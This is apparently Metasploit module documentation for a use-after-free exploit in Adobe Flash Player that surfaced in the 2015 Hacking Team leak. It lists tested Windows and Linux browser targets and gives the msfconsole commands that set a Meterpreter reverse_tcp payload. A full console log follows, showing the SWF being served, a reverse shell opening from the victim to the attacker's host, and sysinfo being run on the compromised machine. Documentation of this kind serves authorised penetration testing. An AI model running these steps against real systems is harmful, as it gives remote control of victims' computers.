## Description

This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on:

1. Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194.
2. Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194.
3. Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194.
4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194.
5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.

## Verification Steps

1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf```
2. Do: ```set payload windows/meterpreter/reverse_tcp```
2. Do: ```set LHOST [IP]```
3. Do: ```set SRVHOST [IP]```
3. Do: ```set URIPATH / [PATH]```
4. Do: ```run```

## Scenarios

### IE 11 and Flash 18.0.0.194

```
msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf 
msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_hacking_team_uaf) > set LHOST 172.16.178.160
LHOST => 172.16.178.160
msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.80
srvhost => 172.16.178.80
msf exploit(adobe_flash_hacking_team_uaf) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_flash_hacking_team_uaf) > set URIPATH /
URIPATH => /
msf exploit(adobe_flash_hacking_team_uaf) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.178.160:4444 
[*] Using URL: http://0.0.0.0:80/
msf exploit(adobe_flash_hacking_team_uaf) > [*] Local IP: http://127.0.0.1:80/
[*] Server started.

msf exploit(adobe_flash_hacking_team_uaf) > 
[*] 172.16.178.80   adobe_flash_hacking_team_uaf - Gathering target information.
[*] 172.16.178.80   adobe_flash_hacking_team_uaf - Sending HTML response.
[*] 172.16.178.80   adobe_flash_hacking_team_uaf - Request: /rGaaQS/
[*] 172.16.178.80   adobe_flash_hacking_team_uaf - Sending HTML...
[*] 172.16.178.80   adobe_flash_hacking_team_uaf - Request: /rGaaQS/AsvCG.swf
[*] 172.16.178.80   adobe_flash_hacking_team_uaf - Sending SWF...
[*] Sending stage (957999 bytes) to 172.16.178.80
[*] Meterpreter session 1 opened (172.16.178.160:4444 -> 172.16.178.80:49167) at 2017-03-26 22:51:29 +0900

msf exploit(adobe_flash_hacking_team_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7X64TJ7XH-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
```
